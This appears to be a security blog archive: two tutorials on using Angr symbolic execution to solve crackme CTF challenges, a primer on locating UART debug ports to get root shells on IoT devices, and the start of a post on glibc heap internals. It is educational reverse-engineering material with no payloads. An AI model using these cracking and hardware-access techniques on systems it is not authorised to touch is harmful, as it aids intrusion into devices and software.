Hi folks, in the previous post I covered a simple example showing how Angr can speed up solving keygen / crackme type challenges. In this one I'm covering an explanation of how symbolic modeling of registers works with Angr and throwing in a weird little problem that required argv constraints to solve.

If you're joining us at this post and find yourself a little lost, then please check out the previous one in the series available here:

[Symbolic Execution 0x0] Solving Easy CTFs with Angr and Symbolic Execution

In the series I'm covering some tricks you can pull off with Angr to model execution states and get some quick solutions to a few novel CTF challenges. As for this post; we move on to modeling register values as part of our initial state and setting constraints on argv or any parameter as part of a solution or initial state.

I'm finding that the key to getting really good at Angr is learning the different parts of its vocabulary for describing execution states. It provides tons of ways to set up an execution state at an arbitrary place in a binary and then crunch away until it exhausts all the potential values for the variables you mark off in the "equation". Obviously the more obscure an execution state you can describe using Angr, the better you'll be able to apply it to Malware, Rootkits or other contrived binaries.

Setting Constraints with Angr

As we know by now the aim of the game is to describe an execution state that models our targeted place in the binary, part of the power you have over this initial state is placing constraints on the values we want to search through for our solution. The following example shows just that for the argument passed to a binary via argv.

To start, here's what our binary looks like:

Ensuring we are on the same page with the analysis, what you should note is:

First couple instructions @0x6d2 and @0x6d5 pull the argv pointer and the value for argc. It then checks that we have at most (jg instruction 0x6dd) 1 argument.
The next code block of interest @0x6f5 ensures that the argv[1] value is a string of length 5
Then the most crucial check for the purpose of our example happens: from 0x718 to 0x72c we can see that the binary ensures that the first character value of the argv[1] string is less than 0x40 - 1; which implies then that it's looking for 0x3F as a character value.

Then it does some weird crap with the argv[1] string from lines 0x738 to 0x77b, finally making decision (based on eax) if we win or not. Again, because of the magic of Angr we can ignore the entire code block and focus solely on the fact that:

It's a "function" of rbp-0x10 or argv[1] value.
It requires some attributes to be met for argv[1] if we are to reach the "weird crap".

We now know enough to model an execution state that will solve for the argv[1] value. Here's how you do it:

If you've been working through some Angr examples yourself you shouldn't need a detailed breakdown of every line, I'm not going to bloat this post by reworking through them either, if you need the catch up work, please check out the previous post. The one addition you can see here though is in line 14:

initial_state.add_constraints(argv.get_byte(0) == 0x3F)

To spare you the mystery, this ensures that whatever values it trudges through for our ear-marked argv[1] variable, the first byte will be hard set to 0x3F.

Constraints like this can really speed up your search and avoid Angr running through tons of options that will never produce a solution; so if you're in the business of solving problems quickly and you'd like to show off your skills with Angr (especially because it runs in python), look out for obvious checks like this. Every single character you can squeeze out as an optimization will save you a butt load of time!
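To get a rough feel for why pinning a single byte helps, here's a toy calculation in plain Python (no Angr involved). It assumes argv[1] is 5 printable ASCII characters, which is my assumption for illustration only; a real solver doesn't enumerate strings one at a time, so treat the numbers as intuition rather than a measurement. The helper name candidates is made up for this sketch.

```python
# Toy illustration (not Angr): how pinning one byte shrinks a search space.
PRINTABLE = 95  # assumption: candidates are printable ASCII, 0x20..0x7E
LENGTH = 5      # argv[1] length the binary checks for


def candidates(length, pinned_bytes=0, alphabet=PRINTABLE):
    """Number of strings left to consider when `pinned_bytes` positions are fixed."""
    return alphabet ** (length - pinned_bytes)


unconstrained = candidates(LENGTH)
constrained = candidates(LENGTH, pinned_bytes=1)  # first byte fixed to 0x3F

print("without constraint:", unconstrained)
print("with first byte pinned:", constrained)
print("shrink factor:", unconstrained // constrained)
```

Each extra byte you can pin divides the space by the alphabet size again, which is why spotting those obvious checks pays off so quickly.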

Okay so you probably don't believe me that this will find the solution, I need to provide hard proof! Here's the run:

I know super obscure value lol and I'm not even sure if the designer of the problem meant for this very strange value to be the actual solution - but that might not matter because the binary clearly likes it and it definitely gets us the flag!

Quite a random place to start but I thought it eased us into things well; a slightly more complex example follows.

Modeling Registers

Registers are an important part of calling conventions. What this means is that, depending on how finely you'd like to model a binary, registers will frequently play a huge role in which function gets a certain argument.

To start off, let's look at our example binary:

and to expand on the get_user_input function:

This one comes straight from the examples Angr provides and as boring as it is to use this as an example; I hafta admit the examples they provide are good, they are even provided in some form of a grammar; so you can work out how to grow more examples from the ones the Angr folks provide (those of you dedicated to mastering this will appreciate that). It does mean you will be able to get these explanations from other posts but the upside is: it also gives you different working and explanations for the same stuff, and often that redundancy really helps speed up cracking the strange enigmas involved in understanding symbolic execution (or anything for that matter!).

Analyzing our binary we see the following important things:

After getting the values via scanf, in lines 0x8048934 to 0x8048944 it transfers them via the pointer arguments given to scanf, to the registers eax,ebx and edx.
In the main, after it calls get_user_input it transfers the register values eax,ebx and edx to memory pointers, from line 0x8048980 to 0x8048986
We can also see that at line 0x804898c the binary passes the eax value to complex_function_1, in the same suite the ebx and edx are passed to complex_function_2 and 3 respectively (at line 0x804899f and 0x80489b2).

Skipping some unsurprising analysis, complex_function_1,2 and 3 are crucial in determining our success and they are obviously functions of our eax,ebx and edx registers. We also probably don't need to model the memory pointers themselves since they are caught nice and neatly by 3 separate registers.

We therefore want to use Angr to model these registers while avoiding the internals of scanf or any unnecessary stack pointer/memory politics (thanks to other blog posts on this subject, see "Reading and References").

Here's our solution script:

We can see some new hotness in the script in lines 16-18:

init_state.regs.eax = arg0
init_state.regs.ebx = arg1
init_state.regs.edx = arg2

Pretty straight forward here, it gives the initial state a heads up and ties some claripy bit vector values to the registers mentioned. This is a very simple example and doesn't involve much drama except for the analysis needed to spot the registers we need to target.
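For those who want to poke at the idea without a binary handy, here's a small sketch of the register binding step. The helper bind_registers and the stand-in fake_state are hypothetical names of mine, not part of Angr; the stand-in only exists so the snippet runs without Angr installed. With the real thing you would pass a state from project.factory.blank_state(addr=...) and values from claripy.BVS(name, 32), with the start address picked from your own analysis.

```python
from types import SimpleNamespace


def bind_registers(state, symbols):
    """Assign each value in `symbols` to the register of the same name on `state`.

    Works on anything exposing a `regs` attribute, which is how an Angr
    state exposes registers (state.regs.eax = value).
    """
    for reg_name, value in symbols.items():
        setattr(state.regs, reg_name, value)
    return state


# Stand-in for an Angr state so the sketch runs anywhere.
# With Angr (assumed usage, not run here):
#   state = project.factory.blank_state(addr=start_address)
#   symbols = {"eax": claripy.BVS("arg0", 32), ...}
fake_state = SimpleNamespace(regs=SimpleNamespace())
bind_registers(fake_state, {"eax": "arg0", "ebx": "arg1", "edx": "arg2"})

print(fake_state.regs.eax, fake_state.regs.ebx, fake_state.regs.edx)
```

Keeping the register names in a dict makes it easy to swap in a different set when the target passes its values through other registers.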

And as for the proof:

Gets to the right solution! Anyway that's it for this one look out for more Angr goodness in future posts.

Reading and References:

"Introduction to angr Part 1" - https://blog.notso.pro/2019-03-25-angr-introduction-part1/

[Symbolic Execution 0x0] Solving easy CTFs with Angr and Symbolic Execution

2019-12-29T04:34:00.003-08:00

Hi folks, I just learned a couple nifty tricks with angr, a popular symbolic execution framework with a very slick python front end. Turns out this tool makes solving the odd crack me CTF extremely easy, I've been porting the same script around for a number of CTF challenges and it's knocking em down like nobody's business. So in the following post I'm going to give you folks a quick crash course in using the tool and show you how easy it is to solve a sample crack me.

What is Symbolic Execution

Without going into full academic detail symbolic execution is essentially hard proof that all the algebra you learned in high school is kinda nifty. Symbolic Execution engines model a program's behavior based on the inputs they are given. These engines (which may vary in their approach) operate by building a database of algebraic statements about a program, sweeping up all the possible assignments and comparisons that may result in a concrete state, after which you are then allowed to query these statements to see if a certain assignment of variables makes a given state reachable. To quote a really helpful paper on this:

More specifically, a symbolic execution engine replaces input
with “symbolic input”—analogous to an algebraic variable—and walks through code paths, “constraining” the symbolic input at each branch such that an input to the
program that satisfies all constraints will cause the program to reach that particular path. The engine can then explore many possible execution paths until it identifies a
specific path or program state of interest, at which point
it can determine the input which would trigger it. - "Teaching with angr: A Symbolic Execution Curriculum and CTF∗" @ https://www.usenix.org/system/files/conference/ase18/ase18-paper_springer.pdf

Another good explanation:

Symbolic execution is a technique that explores feasible paths by setting an input value to
a symbol rather than a real value. The symbolic execution was first published in King’s paper in
1975 [12]. This test technique was developed to verify that a particular area of software may be
violated by the input values. The symbolic execution is largely divided into the offline symbolic
execution and the online symbolic execution. The offline symbol execution solves by choosing only
one path to create a new input value by resolving the path predicate [13]. - An Automated Vulnerability Detection and Remediation Method for Software Security https://www.mdpi.com/2071-1050/10/5/1652

The analogy you should reach here is that it's very similar to solving for "x" in an algebraic equation. We're going to look at a couple different scenarios with Angr and see how exactly you solve for x, but to start we will use a simple approach and let Angr do most of the thinking for us, taking advantage of the clear signals indicating the desired state in a program, i.e. we're going to make Angr try everything until the program literally reports "Good job" or "correct" or whatever gets printed to the screen to indicate that.
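To make the "solve for x" analogy concrete, here's a toy sketch in plain Python. The program and its magic numbers are invented for illustration, and the brute-force loop is only a stand-in for what a real constraint solver does far more cleverly; the point is just that the success branch boils down to an equation over the input.

```python
def program(x):
    """Toy target: reports success for exactly one input byte."""
    if x * 3 + 7 == 52:
        return "Good job"
    return "Try again"


def win_constraint(x):
    # The condition a symbolic engine would record for the success branch.
    return x * 3 + 7 == 52


# Brute force over one byte stands in for the constraint solver here.
solutions = [x for x in range(256) if win_constraint(x)]

print(solutions)
print(program(solutions[0]))
```

A symbolic execution engine collects conditions like win_constraint automatically as it walks the branches, so you never have to write them out by hand.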

Having read the above I don't want you to assume this will take all of the reversing fun away, you will need to tell Angr where to start and stop and what to look for, and this insight will come from reading the code yourself. There may be more contrived "win-states" or more complex phases to getting the correct input into a target function, so don't completely abandon your RE skills just yet hehe.

Simple Example with Angr

The following example shows a CTF challenge I got from a random site, to spare the contestants of the site I won't mention where it's from in case folks are still trying to solve this one, but it's a pretty easy challenge so I doubt too many will be super upset by the solution being shown here. Anyway here's what the binary looks like:

To give you a quick summary of what's going on:

@0x830 we can see the binary grab the argv pointer from the rsi and store it at rbp-0x20 (called var_28)
@0x858 argv[1] is passed to a sub routine called "checkPassword()" via rdi
@0x867 the checkPassword return code (via al register) is checked against 0, if it is 0 the win state is assumed and "Jackpot" is printed to the screen

We aren't even going to cover what checkPassword does or whether there's some cool xor crib or double pad to exploit, we don't need to know! Angr will sort out all the work for us, via the Al-Kawarithmic magic of algebra!

So now we know where to aim, we want to know how to get to the code block @0x869 by giving it a string through argv[1], let's see if we can configure Angr to solve this.

Controlling your Angr

It can be a little complex jumping straight in, so let's talk about the general process of breaking down some symbolic execution with Angr. Here's how the process usually goes:

Define a win condition - for the first couple times you use Angr, and for most simple CTFs this is as difficult as telling which address to look for as a reachable state or telling it to report on input that results in something being printed to the screen.
*(optional) Define a fail condition - you may not need to do this, but you can also tell Angr to avoid certain code blocks in the solutions it posts, again just a simple criteria for the constraints it will search through.
Load up a binary - Not complex at all, this consists of a single API call to tell Angr which binary to analyze.
Define Variables - this tells Angr which values you are ear-marking as criteria for a win state, basically warning it to keep an eye out for how these values influence execution. Also a simple set of API calls, which may vary in complexity depending on whether your values are in registers, coming from the command line, or are just a collection of memory addresses.
Set an initial state - Very important, this is us telling Angr's simulation manager where in the binary we want to get the party started. We can point it at any place in the binary, given it makes sense to execute from there (paying attention to stack conservation and arguments!)
Solve! - this is the part where you tell Angr to make the magic happen.

So to summarize, you basically setup a start execution state, and then tell Angr to run all the goodness until it matches a given criteria.

Scripting up a solution

The following script details the solution.

I've commented the crap outta this but I will line by line this as previous posts on the subject have.

The first line we see doing anything interesting is at 8:

project = angr.Project(elf_binary) #load up binary

This essentially tells angr which binary we want to target. The next line declares a Bit Vector String using Claripy so we can ear mark the argv[1] argument for constraint solving.

arg = claripy.BVS('arg',8*0x20) #set a bit vector for argv[1]

Why a bit vector? Well given that we want to represent all the possibilities for the input, should it not actually require a simple character (guessing only at character level) but some obscure value of bits, telling Claripy we want a vector of individual bit values makes sure we don't miss any details. Modeling the input this way is much more fine grained and realistic, imagine we are modeling some linux driver input here, you definitely want all the possible bit values since some will represent over/under-flowed integers.

Claripy is the constraint solver for Angr, again we need not delve too deep into how it works; but for claripy's sake you can imagine that this builds Abstract Syntax Trees based on the disassembled source in order to structure the arguments stuffed into sub-routines and math procedures. The arguments can be modeled as a couple of different things in order to encompass the different possible aspects of the input. Better coverage of this can be found at Angr's documentation page (https://docs.angr.io/advanced-topics/claripy ).

I've made it way larger than it need be, and if you'd like to model yours a bit tighter you may use some information in the disassembly to declare a smaller BVS for your script.
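If the bit vector idea feels abstract, this plain Python sketch shows the arithmetic behind 8*0x20 and how a byte is picked out of one big integer. The get_byte helper here is my own toy version and it counts from the most significant byte, which, as far as I understand it, is also how claripy's get_byte indexes; the concrete byte string is just an arbitrary example value.

```python
ARG_BITS = 8 * 0x20        # same width as claripy.BVS('arg', 8*0x20)
ARG_BYTES = ARG_BITS // 8  # how many argv[1] characters that covers


def get_byte(value, index, size_bytes):
    """Return byte `index` of an integer, counting from the most significant byte."""
    shift = 8 * (size_bytes - 1 - index)
    return (value >> shift) & 0xFF


# One concrete assignment out of the 2**ARG_BITS the solver may consider.
concrete = bytes(range(0x41, 0x41 + ARG_BYTES))
as_int = int.from_bytes(concrete, "big")

print(ARG_BITS, ARG_BYTES)
print(hex(get_byte(as_int, 0, ARG_BYTES)), hex(get_byte(as_int, 1, ARG_BYTES)))
```

Shrinking the vector to match the real input length from the disassembly cuts the number of bits the solver has to reason about.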

We now need to tell Angr to pay attention to this value, just grabbing an instance of a bit vector is not enough, we need to stuff it into a call that associates it to our project, that happens in line 11:

initial_state = project.factory.entry_state(args=[elf_binary,arg])

Nothing too hard here; we then take this and use it to set up our simulation manager, the thing that steps through our program and checks for the goodness, from line 12-13:

simulation = project.factory.simgr(initial_state)
simulation.explore(find=is_successful)

Angr's simulation manager is pretty nifty, I recommend taking a look at the other amazing options and API calls fleshed out for it here (https://docs.angr.io/core-concepts/pathgroups). For our purposes here we will stick to just telling it where we want to start and when to consider its exploration a success. The last part we need to make sure is defined is the win state. In line 13 we gave the explore function a parameter named "is_successful"; this is a method that Angr will call on each state it calculates, to check whether that state matches our solution. We need to tell it when to return True or False so it knows what we want. For us this means checking the standard output for a certain string "Jackpot":

def is_successful(state):
    output = state.posix.dumps(sys.stdout.fileno())
    if b'Jackpot' in output:
        return True
    return False

This is a typical function call handler style API, you stuff this method name in somewhere as a parameter and in the internal magic of Angr it gets called over and over until a true is reached. What you should pay attention to here is the parameter passed to it, later on you may want to be a bit more creative than just string matching the standard output, so check out what other properties a "state" has in terms of angr's docs and it will give you other ideas you can configure the simulation manager to halt on. Obvious examples being, register values (eip, eax, etc etc) or values in a given memory region or a function of how many times a given code block is hit, the possibilities are endless (in exception of whatever the halting problem prevents you from using as a criteria lol).
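Stitching the quoted lines together, the whole thing might look roughly like the sketch below. This is my reassembly from the fragments in this post rather than the original script verbatim. The function name solve, the fake_state stand-in and the STDOUT_FD constant are names I've introduced, and angr and claripy are imported inside solve so the win-condition check can be tried out without them installed.

```python
from types import SimpleNamespace

STDOUT_FD = 1  # file descriptor of standard output in the simulated process


def is_successful(state):
    """Win condition: the simulated program has printed 'Jackpot'."""
    return b"Jackpot" in state.posix.dumps(STDOUT_FD)


def solve(elf_binary):
    """Search for an argv[1] that reaches the win state (needs angr installed)."""
    import angr      # imported lazily so is_successful works without angr
    import claripy

    project = angr.Project(elf_binary)            # load up binary
    arg = claripy.BVS("arg", 8 * 0x20)            # bit vector for argv[1]
    initial_state = project.factory.entry_state(args=[elf_binary, arg])
    simulation = project.factory.simgr(initial_state)
    simulation.explore(find=is_successful)
    if simulation.found:
        # Ask the solver for one concrete argv[1] that satisfies the path.
        return simulation.found[0].solver.eval(arg, cast_to=bytes)
    return None


def fake_state(output):
    """Hypothetical stand-in for an Angr state, only for trying the handler."""
    return SimpleNamespace(posix=SimpleNamespace(dumps=lambda fd: output))


print(is_successful(fake_state(b"Jackpot!\n")))
print(is_successful(fake_state(b"Nope\n")))
```

Calling solve with the path to your own crackme should hand back the bytes for argv[1] if a winning state is found, or None otherwise.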

Checking this for a solution we see it quickly finds the right string:

Okay so that's pretty solid proof we have the correct answer, I think if you've just started out with Angr you may want to grab this script as a starting point and add small modifications to it to see if you can pump out solutions for other CTF challenges.

happy hacking!

Reading and References

Introduction to Angr (part 1) https://blog.notso.pro/2019-03-25-angr-introduction-part1/
Angr official documentation https://docs.angr.io/
Teaching with angr : a Symbolic Execution Curriculum and CTF* - https://www.usenix.org/system/files/conference/ase18/ase18-paper_springer.pdf

[Hardware] Reverse Engineering UART interfaces (Primer)

2019-06-03T12:52:00.000-07:00

In this post I'm going to run through a crash course about UART, and write up some personal notes I use to find them quickly and dump shells on embedded devices. So it's going to be a little informal at times but the aim of the post is to get the tips and process across quickly so those who want to can get to dumping shells too! So this post is focused on supporting the activity of interacting with UART ports as they appear on an average IoT device.

This is me dumping UART traffic from a device using the Adafruit FTDI Serial TTL-232 cable.

TL;DR

UART exists, it stands for Universal Asynchronous Receiver-Transmitter
It usually comes in at least 3/4 pins Ground (GND), Transmit (TX), Receive (RX), Power (Vcc)
The pins on a board are usually close together and in line, grouped together (especially if the PCB factory uses automated testing on the ports)
It's a serial protocol which means bits are signaled one after the other
Generally used for debugging; implementations often grant root access.
To drop a shell (sub-TL;DR):

Hook up the UART signals to a USB friendly connector
Open a serial console

What is UART?

Well lets start with the name Universal Asynchronous Receiver-Transmitter. The Asynchronous part means that the protocol doesn't explicitly define an external clock to synchronize communication to i.e. one bit transfer per clock edge or clock cycle or every 36000 clock cycles or any "computable" function f(clock_cycles) hehe.

A clock signal, if you're not familiar, is something that offers a regular fluctuation of signal (whatever your signal is made of, rats or electrostatic force). Why does this help computation? Why do you need a clock? Clocks are there for many reasons, most of the important ones being mathematical and theoretical (I erased my rant about successor functions and primitive recursion many times but you can check out more here https://plato.stanford.edu/entries/computability/ ).
Anyway; they allow us to distinguish something's place in a "set" (whatever your set is made of, bits in a byte, memory addresses in a kernel pool, button presses in a time frame etc), or prove that something happened at a given time and synchronize actions between different modules or computing things. Clocks are pretty much always there, the only real difference is whether they are inferred from other aspects of the context; either through the rate at which data is flip flopped out of the chip (the maximum amount of times signal state is allowed to change); or by a literal externally supplied signal.

Anyway UART could be a bit of a strange place to start if you're not used to the hardware stuff (which I'm not entirely used to yet either!) so I thought I'd come in on a bit of a softer landing and talk about communication protocols in general.

Communication can happen in some of the following ways :

On a single wire, one bit sequentially following the other - Serial
Multiple wires each signalling a bit at the same time - Parallel
Signalling based on the difference between signals - Differential
more things exist probably...

UART is on the serial side of things ("I'm super serial you guys" - E. Cartman), each bit is physically signaled down one after the other. It's important to know this because it affects how you interact with the device and sample from it. This orientation of bit signalling will theme how you navigate the errors and pitfalls when interacting with it - this again because you need to line up the bits according to a clock to argue that they were received correctly. For instance if it were parallel, and you don't have all your signals hooked up you're gonna read garbage lol. Another example: if you're reading serial stuff and you aren't making good contact ALL THE TIME or if your device doesn't sample fast enough, you might see a broken clock, and not be able to interpret data correctly. So knowing what the orientation of the bit stream is gonna be is pretty crucial. Anyway on with the UART!

UART comes in many variants; there are modifications that cater to faster data transfer, error correction and parity bit states, etc etc. In this post I'm going to show what a stock standard UART looks like for a random embedded device I've been torturing lately. Before we get into the pins and signals let's look at a simple state machine for the protocol (because after all, even if you're engineering hardware the computer scientists are still frigging amazing at math). The FSMs for UART I'm going to show are for the RX (Receive signal, which will accept data for the UART host) and the TX (Transmit signal, which will send data from the UART host).

State Machine for RX:

Just to provide some clarity on my weird notation the 1,0[8] - means that the state will loop 8 times gobbling up the bits (either 1 or 0). For the latest example the bits are being "gobbled" by being signaled out through RX. Also the "e" means that you don't need any input to transition to this state, some real implementations of UART have states like this; usually to reset the data buffers and counters so they can catch more data when its time.
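Here's a rough software sketch of that RX state machine, in Python rather than Verilog so it's quick to play with. It assumes the most common framing (one start bit, 8 data bits sent least significant bit first, no parity, one stop bit) and exactly one sample per bit, which is a big simplification over real hardware. The names uart_rx and uart_tx are mine, not from any library.

```python
def uart_rx(samples):
    """Decode idle-high 8N1 frames from a list of one-sample-per-bit line levels."""
    state, bits, received = "IDLE", [], []
    for level in samples:
        if state == "IDLE":
            if level == 0:               # start bit pulls the line low
                state, bits = "DATA", []
        elif state == "DATA":
            bits.append(level)           # the 1,0[8] loop: gobble 8 bits
            if len(bits) == 8:
                state = "STOP"
        elif state == "STOP":
            if level == 1:               # valid stop bit, keep the byte
                received.append(sum(bit << i for i, bit in enumerate(bits)))
            state = "IDLE"               # reset and wait for the next frame
    return bytes(received)


def uart_tx(data):
    """Build the line levels a transmitter would emit for `data` (test helper)."""
    samples = [1]                        # line idles high
    for byte in data:
        samples += [0] + [(byte >> i) & 1 for i in range(8)] + [1]
    return samples


print(uart_rx(uart_tx(b"hi")))
```

The return to IDLE after the stop bit plays the role of the "e" style reset described above, clearing the bit buffer so the next frame starts clean.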

The state machine for TX looks exactly the same! It just says "TX" instead of "RX" hehe. But anyway if you know how to implement state machines in verilog this helps a ton (there's an example shown later on). This is because when re-creating a lot of this knowledge during reverse engineering, you'd run across many different types of FSMs describing complex protocols, check out this example from Lattice ( https://www.latticesemi.com/-/media/LatticeSemi/Documents/ReferenceDesigns/SZ/UARTUniversalAsynchronousReceiverTransmitterDocumentation.ashx?document_id=3466 ):

Surprisingly simple no? This is a good place to start with wire/hardware protocols I think, as far as I've looked the other ones can be looked at as different modes and orientations of some of the tricks UART uses.

For instance you can add some states to the FSM; accept 8 bits for a state before going into TX and you have a whole bunch of different instructions or addresses to store stuff or do stuff. From this simple FSM you can build a JTAG, SPI etc etc by simply adding states, and adding states is not a massive mental operation once you've got the previous idea. These simple extensions give you a ton of computational Joo Joo!

An awesome example can be found here https://www.nandland.com/vhdl/modules/module-uart-serial-port-rs232.html - comes in vhdl and verilog!

It's just a simple case statement with extra steps, not that big a deal! The tricky part is finding the friggin ports on the board.

This UART port dropped a root shell :) No uboot foolery needed. As you can see 3 lines are coming off the board, though there are 4 ports on the PCB? This is because one of the pins on the board was for the UART Vcc, which I don't need to use for anything because the module is already powered by the board's power supply.

UART Pins/Signals

UART pinouts can be as bare necessity as they come, ground (obviously); one signal for receiving, one for transmitting and maybe one for the "power in" Vcc.

RX - Receive State, each clock cycle a bit is gobbled up by the device (your "host" TX should be input to this port)
TX - Transmit State, each clock cycle a bit is pushed out by the device through this port (your "host" RX should be connected to this port)
Vcc - Power input, usually if your UART module is mounted to a board you probably don't want to feed this any input, you may overpower the device sometimes!
GND - Ground, very important port, if you don't know where this one is don't connect anything to the port.

Other UART standards may have many other signals if they're fancy and want to signal when data starts being transferred (to blink LEDs or signal other modules to do stuff) so sometimes you might see uart standards with specifications for "RX Data Ready" or "TX Transfer Done" and other transferring metadata.

The most important signals of course are RX, TX and GND you can usually get by with these. So lets look at what some UART interfaces look like on real devices. Here's some examples of UART ports, so you have a few examples to work from:

Straight forward UART give away, we can clearly see the GND, TX, RX ports labelled on the silk screen. One can see the Vcc as the port here that is not labelled, this is probably precisely because the testing equipment doesn't use this port during certain checks.

Example of a UART port on an IP camera PCB

Probing out the Ground pin on a PCB for an IP camera.

Finding UART Ports

Hunting down UART ports is usually pretty easy. People tend to want them to be easily identifiable because either a machine on an assembly line is supposed to find it, or a human - but either way they're not going to have anyone play where's wally to find the debug port. UARTs are typically a straight line of 3 to 4 or more signals. Other typical behavior I've seen is that they sit in a very easy to see / reach place, like on the edge of the board, near a SoC or other external connectors.

The process for identifying these ports is typically the following phases.

Methods for locating the ports/pins

Fastest method is to use the data sheet (my RTFM moment is finally here) for your device or as a first step assume there's a data sheet for literally everything (avoid reverse engineering stuff you don't need to) - and once you are all Google'd out and there's no data sheet anywhere in the whole world wide weeb network, then start playing with the electronics lol.

Find the ground signal. If you don't have a strong ground signal identified (by strong I mean, strongly probably the right definite ground plane lol), interacting with the UART safely is usually very hard to do. I like identifying the ground first because it means I can hook up all my toys without having them explode!

Continuity test between an obvious ground and suspected one (many PCBs have exposed metal around USB ports, power inlets etc etc that will usually be grounded). To double check that you have the right ground I suggest finding the ground of the power or other ports as well and checking that there is continuity between an obvious ground, and your UART ground.

If you have other ports near this one, check the voltage difference across some of them. Obviously making sure the numbers make sense (should be around 3-5 Volts, anything massively higher is highly strange).

If you have identified another SoC or chip on the board and you have the data sheet for it. See if you can find out whether:

It has a TX or RX (or MOSI / MISO any serial ports would be huge clues!) on it, see if this might give you more context on the possible UART port you're looking for. Obviously sometimes the system on chip needs to dump its debug data so it should be talking to the UART some how right? Could mean there's continuity between some pins!

Easy to see which one is ground. This is from a stock standard router I plucked off amazon. The two signals other than ground are as you guessed it RX and TX.

Interacting with the ports (logic tracing)

Hook up a logic analyzer to it (you don't always need a Saleae or how ever you spell it, some cheapo $20 ones sometimes do the job just fine!). Make sure your logic analyzer is grounded of course! And that the ground is common to the supposed UART!

Logic analyzing the UART on an IP Camera board. I'm using a cheapo logic analyzer here, it barely samples above 25 MHz hehe but it does the job sometimes!

Power the device, try to capture what you think will be where most of the OS debug noise will happen - sometimes it never stops and just keeps going, but you can't capture for ever and you don't need a huge capture to confirm a UART either - so think a bit about the device life cycle!

Look for some signals that register the following characteristics:

CLK - usually this is a very regular square wave signal (check out some of the examples)
GND - just kidding you shouldn't be seeing this in your logic analyzer! Stay woke people!
RX - if you're talking about the RX from the board's perspective, this shouldn't be showing anything; it should just be pulled high or stay constant at some level the whole time
TX - this is where the action is, if you're looking at a common TX signal for a UART it should start showing some "OS boot-loadery" looking data, or just readable data of some kind. For a lot of embedded devices this results in a direct bootloader shell, so expect kernel, expect Linux, expect us we are anonym-lol jk.

Some UART traffic. You'll notice that at some point the UART byte signaled down always has a clock cycle with a first flop that doesn't contribute to the SET of bits that form part of the byte; this is because that little flop at the beginning is a start bit, it's a signal that communicates the start of the RX cycle.
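Since there's no clock wire to lean on, one handy trick with a capture like this is to measure the shortest pulse (one bit wide, for example the start bit) and guess the baud rate from it. Below is a small sketch of that arithmetic. The list of common rates is my own selection and the pulse widths are made-up example measurements, not values from this capture.

```python
# Assumption: the device uses one of these commonly seen baud rates.
COMMON_BAUD_RATES = [9600, 19200, 38400, 57600, 115200]


def guess_baud(shortest_pulse_seconds):
    """Pick the common baud rate closest to 1 / (width of a single bit)."""
    measured = 1.0 / shortest_pulse_seconds
    return min(COMMON_BAUD_RATES, key=lambda rate: abs(rate - measured))


def samples_per_bit(sample_rate_hz, baud):
    """How many logic analyzer samples land inside one bit at this baud rate."""
    return sample_rate_hz / baud


baud = guess_baud(8.7e-6)  # hypothetical measured pulse width of 8.7 microseconds
print(baud)
print(samples_per_bit(25_000_000, baud))
```

If the samples per bit figure comes out in the low single digits your analyzer is too slow for that rate and the decoded bytes will likely look like garbage.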

Interacting with the ports (dumping a UART shell)

Get some serial bytes onto your machine. There are various ways to do this, I'll briefly cover some methods that haven't failed me so far (in my limited experience):

Bus Pirate - I know its a essentially the script kiddie version of nmap for hardware hackers; but to be honest it gets the job done and its damn easy to use!

FTDI Serial TTL-232 cable - hook your port up to this and stick it straight into your machine; the FTDI chip on these gadgets takes care of all the gritty details involved in turning the RX / TX into something picocom can pick up on your machine.

https://www.adafruit.com/product/70

FPGA - for the hardcore folks out there, you can probably hook the UART up to an FPGA and use it to forward the data over to your machine using the FPGA's UART.

Open a serial port and suck out some bytes. Many tools exist to solve this problem but it usually comes down to either picocom (I use picocom a lot!), minicom or screen; anyway here are some simple tutorials for getting them going.

Anyway that's it for this post, I'll cover more hands on UART stuff soon! Stay tuned!

Glibc Heap Exploitation Basics : ptmalloc2 internals (Part 3) : The Main Arena

2019-03-14T18:17:00.002-07:00

Hi folks, this post is part of a series in which I try to explore the internals of ptmalloc2, glibc's implementation for managing heap memory. In this post I'm going to specifically pay attention to the main_arena and the malloc_state structure, which is used to store some important pointers for searching heap memory.

The main arena

The heap bakes the main_arena struct right into process memory. It's a struct of the type malloc_state and holds the following fields (extract from glibc-2.23/malloc/malloc.c):

struct malloc_state
{
  /* Serialize access. */
  mutex_t mutex;

  /* Flags (formerly in max_fast). */
  int flags;

  /* Fastbins */
  mfastbinptr fastbinsY[NFASTBINS];

  /* Base of the topmost chunk -- not otherwise kept in a bin */
  mchunkptr top;

  /* The remainder from the most recent split of a small request */
  mchunkptr last_remainder;

  /* Normal bins packed as described above */
  mchunkptr bins[NBINS * 2 - 2];

  /* Bitmap of bins */
  unsigned int binmap[BINMAPSIZE];

  /* Linked list */
  struct malloc_state *next;

  /* Linked list for free arenas. Access to this field is serialized
     by free_list_lock in arena.c. */
  struct malloc_state *next_free;

  /* Number of threads attached to this arena. 0 if the arena is on
     the free list. Access to this field is serialized by
     free_list_lock in arena.c. */
  INTERNAL_SIZE_T attached_threads;

  /* Memory allocated from the system in this arena. */
  INTERNAL_SIZE_T system_mem;
  INTERNAL_SIZE_T max_system_mem;
};

Here's what some of the interesting fields mean (in addition to the already very helpful docs):

mutex_t mutex - this field is an integer that can be used to prevent other threads from messing with the arena while it's being modified. We can see a confirmation of this in the code:

/* The mutex functions used to do absolutely nothing, i.e. lock,
   trylock and unlock would always just return 0. However, even
   without any concurrently active threads, a mutex can be used
   legitimately as an `in use' flag. To make the code that is
   protected by a mutex async-signal safe, these macros would have to
   be based on atomic test-and-set operations, for example. */
typedef int mutex_t;

# define mutex_init(m) (*(m) = 0)
# define mutex_lock(m) ({ *(m) = 1; 0; })
# define mutex_trylock(m) (*(m) ? 1 : ((*(m) = 1), 0))
# define mutex_unlock(m) (*(m) = 0)

#endif /* !defined mutex_init */

int flags - this is an integer field that an arena uses to mark itself with properties. Should there be more than one arena (peep at the linked list node below and the clues about attached_threads), each one carries its own flags. In order to make using this field easy there is an accompanying list of macros for it in the code:

#define have_fastchunks(M) (((M)->flags & FASTCHUNKS_BIT) == 0)
#define clear_fastchunks(M) catomic_or (&(M)->flags, FASTCHUNKS_BIT)
#define set_fastchunks(M) catomic_and (&(M)->flags, ~FASTCHUNKS_BIT)

...

#define NONCONTIGUOUS_BIT (2U)

#define contiguous(M) (((M)->flags & NONCONTIGUOUS_BIT) == 0)
#define noncontiguous(M) (((M)->flags & NONCONTIGUOUS_BIT) != 0)
#define set_noncontiguous(M) ((M)->flags |= NONCONTIGUOUS_BIT)
#define set_contiguous(M) ((M)->flags &= ~NONCONTIGUOUS_BIT)

